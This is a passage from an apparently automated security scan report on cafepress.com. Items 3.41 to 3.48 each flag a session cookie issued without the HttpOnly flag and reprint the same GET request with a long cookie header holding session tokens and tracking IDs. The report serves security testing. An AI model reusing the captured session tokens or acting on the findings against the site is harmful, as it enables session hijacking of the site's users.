Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

3.41. http://www.cafepress.com/1/1/indexd1.html previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/1/1/indexd1.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slx_session=4acaabeaecefdd8dff9a0090c3edc432b686b9f4; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/1/indexd1.html HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

3.42. http://www.cafepress.com/1/3/index1.html previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/1/3/index1.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slx_session=400f6b47f695c657eb3c14bc7e3e4a27523d7ef2; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/3/index1.html HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

3.43. http://www.cafepress.com/1/3/indexb1.html previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/1/3/indexb1.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slx_session=10526678dae4a1b5ae00b9cc20c52864241e4c1d; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/3/indexb1.html HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

3.44. http://www.cafepress.com/1/3/indexc1.html previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/1/3/indexc1.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slx_session=2f1df64475595c86770a06bc37800f787200ef6f; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/3/indexc1.html HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

3.45. http://www.cafepress.com/TheGamingApe previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/TheGamingApe

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /TheGamingApe HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

3.46. http://www.cafepress.com/cp/catalogExp/RedirectWithSEOURL.aspx previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/cp/catalogExp/RedirectWithSEOURL.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cp/catalogExp/RedirectWithSEOURL.aspx HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

3.47. http://www.cafepress.com/cp/catalogExp/addtocarthelper.aspx previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/cp/catalogExp/addtocarthelper.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cp/catalogExp/addtocarthelper.aspx HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

3.48. http://www.cafepress.com/cp/info/about/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/cp/info/about/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cp/info/about/ HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; 